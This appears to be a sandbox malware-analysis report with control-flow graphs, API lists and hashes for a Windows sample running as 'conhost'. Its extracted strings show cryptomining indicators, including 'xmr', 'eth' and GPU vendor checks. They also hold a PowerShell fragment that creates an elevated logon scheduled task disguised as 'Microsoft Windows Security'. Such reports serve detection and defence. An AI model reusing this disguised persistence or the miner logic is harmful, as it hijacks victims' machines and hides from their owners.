                                                                                                                                                                                                                                                    control_flow_graph 225 7ff6ce1f1180-7ff6ce1f11ae 226 7ff6ce1f11b4-7ff6ce1f11d1 225->226 227 7ff6ce1f1450-7ff6ce1f1453 GetStartupInfoA 225->227 228 7ff6ce1f11e4-7ff6ce1f11ef 226->228 231 7ff6ce1f1460-7ff6ce1f147a call 7ff6ce2065f0 227->231 229 7ff6ce1f11d3-7ff6ce1f11d6 228->229 230 7ff6ce1f11f1-7ff6ce1f11ff 228->230 235 7ff6ce1f13f0-7ff6ce1f1401 229->235 236 7ff6ce1f11dc-7ff6ce1f11e1 Sleep 229->236 232 7ff6ce1f1205-7ff6ce1f1209 230->232 233 7ff6ce1f1407-7ff6ce1f1416 call 7ff6ce2065e8 230->233 237 7ff6ce1f1480-7ff6ce1f1499 call 7ff6ce206600 232->237 238 7ff6ce1f120f-7ff6ce1f121e 232->238 242 7ff6ce1f1224-7ff6ce1f1226 233->242 243 7ff6ce1f141c-7ff6ce1f1437 _initterm 233->243 235->232 235->233 236->228 251 7ff6ce1f149e-7ff6ce1f14a6 call 7ff6ce206630 237->251 238->242 238->243 245 7ff6ce1f122c-7ff6ce1f1239 242->245 246 7ff6ce1f143d-7ff6ce1f1442 242->246 243->245 243->246 248 7ff6ce1f123b-7ff6ce1f1243 245->248 249 7ff6ce1f1247-7ff6ce1f128f call 7ff6ce1fd7b0 SetUnhandledExceptionFilter call 7ff6ce206070 call 7ff6ce1fd530 call 7ff6ce206050 245->249 246->245 248->249 261 7ff6ce1f12a5-7ff6ce1f12ab 249->261 262 7ff6ce1f1291 249->262 264 7ff6ce1f1293-7ff6ce1f1295 261->264 265 7ff6ce1f12ad-7ff6ce1f12bb 261->265 263 7ff6ce1f12e7-7ff6ce1f12ed 262->263 269 7ff6ce1f12f3-7ff6ce1f1318 malloc 263->269 270 7ff6ce1f13d0-7ff6ce1f13da 263->270 266 7ff6ce1f12c0-7ff6ce1f12c2 264->266 267 7ff6ce1f1297-7ff6ce1f129a 264->267 268 7ff6ce1f12a1 265->268 272 7ff6ce1f12c4 266->272 273 7ff6ce1f12d5-7ff6ce1f12de 266->273 267->266 271 7ff6ce1f129c 267->271 268->261 276 7ff6ce1f135c-7ff6ce1f1390 call 7ff6ce1fd340 call 7ff6ce2085c0 269->276 277 7ff6ce1f131a-7ff6ce1f1320 269->277 274 7ff6ce1f13e1-7ff6ce1f13e7 270->274 275 7ff6ce1f13dc 270->275 271->268 280 7ff6ce1f12e0 272->280 273->280 281 7ff6ce1f12d0-7ff6ce1f12d3 273->281 274->269 275->274 286 7ff6ce1f1395-7ff6ce1f13a3 276->286 278 7ff6ce1f1325-7ff6ce1f1355 strlen malloc memcpy 277->278 282 7ff6ce1f1322 278->282 283 7ff6ce1f1357 278->283 280->263 281->273 281->280 282->278 283->276 286->251 287 7ff6ce1f13a9-7ff6ce1f13b1 286->287 287->231 288 7ff6ce1f13b7-7ff6ce1f13c6 287->288
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 649803965-0
                                                                                                                                                                                                                                                    • Opcode ID: bef71663f6727e431b96fe150fb6a14801079257b7d8a09b9d0d6fdac41f2695
                                                                                                                                                                                                                                                    • Instruction ID: 90ae7881be4808f7f9db57fd34f0fd9fd0f81c96b34e7cbaef9f4ba75aa65e7e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bef71663f6727e431b96fe150fb6a14801079257b7d8a09b9d0d6fdac41f2695
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28817E32F0868685FB209F95E65177933B1BF64BA6F444035EE8DE3B92DE6DE8108340

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 171 7ff6ce1f1720-7ff6ce1f1796 172 7ff6ce1f17d5-7ff6ce1f17e7 call 7ff6ce1f40c6 171->172 175 7ff6ce1f17a0-7ff6ce1f17cd call 7ff6ce1f402d 172->175 176 7ff6ce1f17e9-7ff6ce1f17eb 172->176 175->172 178 7ff6ce1f1e30-7ff6ce1f1e3d 176->178 179 7ff6ce1f17f1-7ff6ce1f1824 176->179 182 7ff6ce1f1e50-7ff6ce1f1e70 wcslen 178->182 181 7ff6ce1f1850-7ff6ce1f185e 179->181 183 7ff6ce1f1830-7ff6ce1f1835 181->183 184 7ff6ce1f1860-7ff6ce1f1867 181->184 191 7ff6ce1f1e80 182->191 185 7ff6ce1f1990-7ff6ce1f19b1 call 7ff6ce1f4045 183->185 186 7ff6ce1f183b-7ff6ce1f184a 183->186 187 7ff6ce1f1869-7ff6ce1f18a1 call 7ff6ce1f14f0 184->187 188 7ff6ce1f18a6-7ff6ce1f18ad 184->188 185->191 197 7ff6ce1f19b7-7ff6ce1f1a1a call 7ff6ce1f4075 call 7ff6ce1f3c50 memset 185->197 186->181 186->185 187->188 189 7ff6ce1f18af-7ff6ce1f1904 188->189 190 7ff6ce1f190c-7ff6ce1f1924 wcsncmp 188->190 189->190 190->183 194 7ff6ce1f192a-7ff6ce1f1988 call 7ff6ce1f405d 190->194 194->183 200 7ff6ce1f198e 194->200 204 7ff6ce1f1a51-7ff6ce1f1a58 197->204 205 7ff6ce1f1a1c-7ff6ce1f1a4c call 7ff6ce1f14f0 197->205 200->185 206 7ff6ce1f1a9f-7ff6ce1f1acc wcscpy wcscat wcslen 204->206 207 7ff6ce1f1a5a-7ff6ce1f1a97 204->207 205->204 209 7ff6ce1f1ad2-7ff6ce1f1af0 wcslen 206->209 210 7ff6ce1f1e08-7ff6ce1f1e1a 206->210 207->206 211 7ff6ce1f1e20-7ff6ce1f1e2b 209->211 212 7ff6ce1f1af6-7ff6ce1f1b02 wcslen 209->212 210->211 210->212 213 7ff6ce1f1b07-7ff6ce1f1b28 211->213 212->213 213->182 214 7ff6ce1f1b2e-7ff6ce1f1e00 wcslen * 2 call 7ff6ce1f402d * 2 call 7ff6ce1f4069 call 7ff6ce1f4045 * 2 213->214
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memsetwcsncmp
                                                                                                                                                                                                                                                    • String ID: %S /run /tn "Microsoft Windows Security"$%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest $0$X$\??\$`$explorer.exe$xmr
                                                                                                                                                                                                                                                    • API String ID: 1181335886-2264807111
                                                                                                                                                                                                                                                    • Opcode ID: 9340c56cd80f63489d28db57b46e1f31c9ba72a2ab9b3280ce8ad71af1fbfc60
                                                                                                                                                                                                                                                    • Instruction ID: f2340201c8ceb440e251207883197702dc7769a596b79530da4b72f65fa67a4b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9340c56cd80f63489d28db57b46e1f31c9ba72a2ab9b3280ce8ad71af1fbfc60
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF027C72A18BC185E3218F25E8013AA77B1FBA57A5F004335EAECA7AD5DF3DD5848740

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memsetwcsncmp
                                                                                                                                                                                                                                                    • String ID: \BaseNamedObjects\vljmdnomkxppwbqz$eth
                                                                                                                                                                                                                                                    • API String ID: 1181335886-3208800472
                                                                                                                                                                                                                                                    • Opcode ID: 0b5ccc7bbee36a88c8147fb3cb6218f60deec08863c1a95231d2b2b3d10a26d2
                                                                                                                                                                                                                                                    • Instruction ID: 3f5da42ef06ee8e5a3cc9bf97dbfda5961bbd8e4be07bd8d9cb0037af645ebc6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b5ccc7bbee36a88c8147fb3cb6218f60deec08863c1a95231d2b2b3d10a26d2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D901E522B0C68141E220EA16A8007EA6671AF95BE1F544231FECC63FD5CE7CD546CB44

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: wcslen
                                                                                                                                                                                                                                                    • String ID: 0$eth
                                                                                                                                                                                                                                                    • API String ID: 4088430540-242559905
                                                                                                                                                                                                                                                    • Opcode ID: 3574754aed9c12ba8bdea8b4331650656b37aea54c0df955361aacc6e335debb
                                                                                                                                                                                                                                                    • Instruction ID: 1bb6bbe75a2d682b68bfcfcad866e29f9555d27e242d84b5ea1265c29f71aece
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3574754aed9c12ba8bdea8b4331650656b37aea54c0df955361aacc6e335debb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A01C02261868082E7109B51F85479BA770EF84768F640325FA9856ED5EF3EC5958B40

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 352 7ff6ce1f1ea0-7ff6ce1f1f16 call 7ff6ce206680 355 7ff6ce1f1f43-7ff6ce1f1f4a 352->355 356 7ff6ce1f1f18-7ff6ce1f1f3e memcpy call 7ff6ce1f14f0 352->356 358 7ff6ce1f1f50-7ff6ce1f2086 355->358 359 7ff6ce1f208d-7ff6ce1f20bb wcslen memcpy 355->359 356->355 358->359 360 7ff6ce1f20bd-7ff6ce1f20e3 memcpy call 7ff6ce1f14f0 359->360 361 7ff6ce1f20e8-7ff6ce1f20ef 359->361 360->361 363 7ff6ce1f20f5-7ff6ce1f222b 361->363 364 7ff6ce1f2232-7ff6ce1f2278 361->364 363->364 365 7ff6ce1f22cf-7ff6ce1f22d6 364->365 366 7ff6ce1f227a-7ff6ce1f22ca call 7ff6ce1f14f0 364->366 368 7ff6ce1f233c-7ff6ce1f2375 wcslen 365->368 369 7ff6ce1f22d8-7ff6ce1f2334 365->369 366->365 370 7ff6ce1f23ca-7ff6ce1f23d1 368->370 371 7ff6ce1f2377-7ff6ce1f23c5 call 7ff6ce1f14f0 368->371 369->368 373 7ff6ce1f23d3-7ff6ce1f242f 370->373 374 7ff6ce1f2437-7ff6ce1f24a3 call 7ff6ce1f40ed 370->374 371->370 373->374 377 7ff6ce1f2929 374->377 378 7ff6ce1f24a9-7ff6ce1f24ea 374->378 379 7ff6ce1f292b-7ff6ce1f2969 377->379 380 7ff6ce1f24f3-7ff6ce1f2517 call 7ff6ce1f40f9 378->380 383 7ff6ce1f291f-7ff6ce1f2924 call 7ff6ce1f3fdf 380->383 384 7ff6ce1f251d-7ff6ce1f2589 call 7ff6ce1f40ed 380->384 383->377 388 7ff6ce1f24f0 384->388 389 7ff6ce1f258f-7ff6ce1f25b6 call 7ff6ce1f4114 384->389 388->380 392 7ff6ce1f2910-7ff6ce1f291a call 7ff6ce1f3fdf 389->392 393 7ff6ce1f25bc-7ff6ce1f25ce 389->393 392->388 395 7ff6ce1f2610-7ff6ce1f2617 393->395 396 7ff6ce1f25d0-7ff6ce1f260b call 7ff6ce1f14f0 393->396 399 7ff6ce1f2619-7ff6ce1f267e 395->399 400 7ff6ce1f2686-7ff6ce1f269d _wcsnicmp 395->400 396->395 399->400 401 7ff6ce1f26a3-7ff6ce1f26aa 400->401 402 7ff6ce1f296a-7ff6ce1f2983 call 7ff6ce1f3fdf * 2 400->402 404 7ff6ce1f26d4-7ff6ce1f26db 401->404 405 7ff6ce1f26ac-7ff6ce1f26cf call 7ff6ce1f14f0 401->405 402->379 406 7ff6ce1f270c-7ff6ce1f2723 _wcsnicmp 404->406 407 7ff6ce1f26dd-7ff6ce1f2704 404->407 405->404 406->402 410 7ff6ce1f2729-7ff6ce1f2730 406->410 407->406 412 7ff6ce1f2732-7ff6ce1f2755 call 7ff6ce1f14f0 410->412 413 7ff6ce1f275a-7ff6ce1f2761 410->413 412->413 416 7ff6ce1f2792-7ff6ce1f27a9 _wcsnicmp 413->416 417 7ff6ce1f2763-7ff6ce1f278a 413->417 416->402 418 7ff6ce1f27af-7ff6ce1f27e4 416->418 417->416 419 7ff6ce1f2854-7ff6ce1f285b 418->419 420 7ff6ce1f27e6-7ff6ce1f284f call 7ff6ce1f14f0 418->420 422 7ff6ce1f2861-7ff6ce1f28f4 419->422 423 7ff6ce1f28fc-7ff6ce1f290e wcsstr 419->423 420->419 422->423 423->392 423->402
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpy$wcslen
                                                                                                                                                                                                                                                    • String ID: $0'$0$@$AMD$APPDATA=$ATI$Advanced Micro Devices$NVIDIA$ProviderName$ProviderName$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\
                                                                                                                                                                                                                                                    • API String ID: 1844840824-1300809496
                                                                                                                                                                                                                                                    • Opcode ID: 5b5f1375f3de931362796e278fad743eef0130830d29893e114e696d61781ae2
                                                                                                                                                                                                                                                    • Instruction ID: 48757376f480a0a6078c24429338a70b303ee81cd7f0f854a0f5b2d110b692ec
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b5f1375f3de931362796e278fad743eef0130830d29893e114e696d61781ae2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77527F65D2CAC294F7129F69E9513B47371BFA1382F054231E9C9B26A1EF2EE7458304

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 424 7ff6ce1fee40-7ff6ce1fee55 425 7ff6ce1fee90-7ff6ce1fee9d malloc 424->425 426 7ff6ce1fee57-7ff6ce1fee63 malloc 424->426 428 7ff6ce1feed2-7ff6ce1fef11 abort CreateSemaphoreW TlsAlloc 425->428 429 7ff6ce1fee9f-7ff6ce1feeb8 425->429 427 7ff6ce1fee65-7ff6ce1fee76 426->427 426->428 430 7ff6ce1feeba-7ff6ce1feed1 memset 427->430 431 7ff6ce1fee78-7ff6ce1fee8d memcpy 427->431 433 7ff6ce1fef13-7ff6ce1fef22 call 7ff6ce2067e0 428->433 434 7ff6ce1fef30-7ff6ce1fef36 GetLastError 428->434 429->430 429->431 436 7ff6ce1fef27-7ff6ce1fef29 433->436 434->436 437 7ff6ce1fef2b-7ff6ce1fef2f 436->437 438 7ff6ce1fef38-7ff6ce1fef5c abort 436->438 439 7ff6ce1fef5e-7ff6ce1fef65 438->439 440 7ff6ce1fef78-7ff6ce1fef7f 438->440 441 7ff6ce1fefe0-7ff6ce1fefe9 call 7ff6ce1fee40 439->441 442 7ff6ce1fef67-7ff6ce1fef73 439->442 443 7ff6ce1fef81-7ff6ce1fefa9 GetLastError TlsGetValue SetLastError 440->443 444 7ff6ce1feff0-7ff6ce1feff6 440->444 441->442 445 7ff6ce1ff060-7ff6ce1ff07a calloc 443->445 446 7ff6ce1fefaf-7ff6ce1fefb5 443->446 448 7ff6ce1feffc-7ff6ce1ff006 444->448 449 7ff6ce1ff10a-7ff6ce1ff111 444->449 450 7ff6ce1ff193-7ff6ce1ff1a3 abort 445->450 451 7ff6ce1ff080 445->451 452 7ff6ce1fefbb-7ff6ce1fefc7 446->452 453 7ff6ce1ff0a8-7ff6ce1ff0cf realloc 446->453 455 7ff6ce1ff00c-7ff6ce1ff014 448->455 456 7ff6ce1ff138-7ff6ce1ff140 448->456 449->443 457 7ff6ce1ff117-7ff6ce1ff12d 449->457 460 7ff6ce1ff1a5-7ff6ce1ff1a8 450->460 461 7ff6ce1ff1b0-7ff6ce1ff1b4 450->461 458 7ff6ce1ff083-7ff6ce1ff094 TlsSetValue 451->458 452->442 459 7ff6ce1fefc9-7ff6ce1fefd6 call 7ff6ce1fee40 452->459 453->450 462 7ff6ce1ff0d5-7ff6ce1ff0ef memset 453->462 463 7ff6ce1ff16c-7ff6ce1ff180 WaitForSingleObject 455->463 464 7ff6ce1ff01a-7ff6ce1ff021 455->464 465 7ff6ce1ff142-7ff6ce1ff15a 456->465 466 7ff6ce1ff0f1-7ff6ce1ff0f6 call 7ff6ce1feee0 456->466 458->452 470 7ff6ce1ff09a-7ff6ce1ff09d GetLastError 458->470 459->442 460->461 472 7ff6ce1ff1ba-7ff6ce1ff1bd 461->472 473 7ff6ce1ff1b6 461->473 462->458 463->464 469 7ff6ce1ff186-7ff6ce1ff18e 463->469 464->457 475 7ff6ce1ff027-7ff6ce1ff02b 464->475 467 7ff6ce1ff100-7ff6ce1ff104 465->467 468 7ff6ce1ff15c 465->468 466->467 467->449 467->455 477 7ff6ce1ff160-7ff6ce1ff168 Sleep 468->477 469->464 470->452 479 7ff6ce1ff1c4 472->479 480 7ff6ce1ff1bf-7ff6ce1ff1c2 472->480 473->472 475->443 476 7ff6ce1ff031-7ff6ce1ff039 475->476 476->443 482 7ff6ce1ff03f-7ff6ce1ff054 ReleaseSemaphore 476->482 477->477 483 7ff6ce1ff16a 477->483 480->479 484 7ff6ce1ff1c8-7ff6ce1ff1cc 480->484 482->443 483->467
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: abortmalloc$AllocCreateErrorLastSemaphorememcpymemset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 342303811-0
                                                                                                                                                                                                                                                    • Opcode ID: b2416a83bffa5fc6a8860ff2eb45399a5a421c851ee01e0b810f98d5426b795e
                                                                                                                                                                                                                                                    • Instruction ID: 92d89f514d18e3f9453b3ac4ab0ff8bd67b4553537444f5125d17122a4bf4b85
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2416a83bffa5fc6a8860ff2eb45399a5a421c851ee01e0b810f98d5426b795e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5391CF32E0964281EA249F65E91077933B2AF68F96F548135F98DA3B90DF3DE951C380

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: fwrite$fputs$abortfree$fputcmemcpystrlen
                                                                                                                                                                                                                                                    • String ID: what(): $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
                                                                                                                                                                                                                                                    • API String ID: 802779101-808685626
                                                                                                                                                                                                                                                    • Opcode ID: ceb530bee48f6c0e02abd5d77287cb5c52b4f910e624d328fc38845c7a1d0db6
                                                                                                                                                                                                                                                    • Instruction ID: 5d6e22255d22a11c7ea9ef586956d97f41e0bddb2c35a1a8217a7c6551507247
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ceb530bee48f6c0e02abd5d77287cb5c52b4f910e624d328fc38845c7a1d0db6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C941C370B0919606FA14BF71AA35BB93A719FA5B82F400039F9CDE7BD2DD2CE5018311

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaiseUnwindabort
